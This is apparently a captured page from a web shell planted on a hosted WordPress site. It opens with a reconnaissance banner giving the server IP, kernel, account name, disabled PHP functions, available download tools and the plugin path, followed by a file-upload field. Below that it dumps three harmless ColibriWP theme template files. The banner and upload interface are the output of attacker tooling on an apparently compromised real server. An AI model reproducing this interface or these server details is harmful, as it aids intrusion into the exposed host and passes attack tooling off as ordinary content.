| Server IP : 146.59.209.152 / Your IP : 216.73.216.46 Web Server : Apache System : Linux webm005.cluster131.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 User : infrafs ( 43850) PHP Version : 8.2.29 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/i/n/f/infrafs/INFRABIKEIT/wp-content/plugins/ |
Upload File : |
homepage.php 0000644 00000000234 15133245427 0007047 0 ustar 00 <?php
/*
* Template Name: Front Page Template
*/
get_header();
?>
<?php colibriwp_theme()->get( 'front-page-content' )->render(); ?>
<?php get_footer();
full-width-page.php 0000644 00000000234 15133245427 0010253 0 ustar 00 <?php
/*
* Template Name: Full Width Template
*/
get_header();
?>
<?php colibriwp_theme()->get( 'front-page-content' )->render(); ?>
<?php get_footer();
landing-page.php 0000644 00000001270 15133245427 0007611 0 ustar 00 <?php
/*
* Template Name: Landing Page Template
*/
?>
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="profile" href="http://gmpg.org/xfn/11">
<?php wp_head(); ?>
<?php colibriwp_theme()->get( 'css' )->render(); ?>
</head>
<body id="colibri" <?php body_class(); ?>>
<?php
if ( function_exists( 'wp_body_open' ) ) {
wp_body_open();
} else {
do_action( 'wp_body_open' );
}
?>
<div class="site" id="page-top">
<?php colibriwp_theme()->get( 'front-page-content' )->render(); ?>
</div>
<?php wp_footer(); ?>
</body>
</html>